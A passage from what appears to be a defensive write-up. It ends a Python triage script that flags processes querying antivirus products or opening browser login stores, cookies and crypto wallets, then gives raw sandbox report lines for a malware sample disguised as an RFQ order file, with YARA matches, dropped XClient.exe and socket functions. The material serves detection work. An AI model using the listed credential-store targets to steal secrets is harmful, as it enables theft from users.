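    return {p: sorted(tags) for p, tags in found.items()}


# Constructed sample: paths copied from the report, plus a CIMV2 hardware query
# and a browser opening its own store, which must NOT be flagged.
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct",
    r"Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct",
    r"Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor",
    r"Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite",
    r"Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior",
    r"Source: C:\Program Files\Google\Chrome\Application\chrome.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Local\Temp\readme.txt",
]

if __name__ == "__main__":
    for proc, tags in triage(SAMPLE_LINES).items():
        print(proc, ", ".join(tags))
```

Run against the constructed sample, triage() reports build.exe with all three tags and nothing for chrome.exe. The same three checks translate directly to endpoint telemetry (process image plus target path for the file opens; WMI-Activity tracing for the queries); the allowlist is the part to tune per estate, since backup agents and password managers also open browser stores.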
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Binary or memory string: WIN_81
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Binary or memory string: WIN_XP
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Binary or memory string: WIN_XPe
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Binary or memory string: WIN_VISTA
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Binary or memory string: WIN_7
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Binary or memory string: WIN_8
Source: exhilaratingly.exe, 00000014.00000002.1393593446.00000000004B4000.00000002.00000001.01000000.00000004.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: Yara match File source: 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: build.exe PID: 6104, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 5.2.RegSvcs.exe.3d96bf0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegSvcs.exe.3d007a0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.build.exe.6b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegSvcs.exe.3d007a0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegSvcs.exe.3d4b9d0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegSvcs.exe.3d96bf0.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegSvcs.exe.3d4b9d0.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.1272520755.0000000003CB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.1258507285.00000000006B2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1272520755.0000000003D34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1272520755.0000000003D8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 936, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: build.exe PID: 6104, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED
Source: Yara match File source: 5.2.RegSvcs.exe.2d0ea18.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegSvcs.exe.2d0ea18.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegSvcs.exe.2d18074.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegSvcs.exe.2d053d4.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegSvcs.exe.2d18074.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegSvcs.exe.2d053d4.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.XClient.exe.b20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.1271729199.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2500110094.0000000002F56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.1260246043.0000000000B22000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 936, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: XClient.exe PID: 7184, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00476283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 0_2_00476283
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00476747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00476747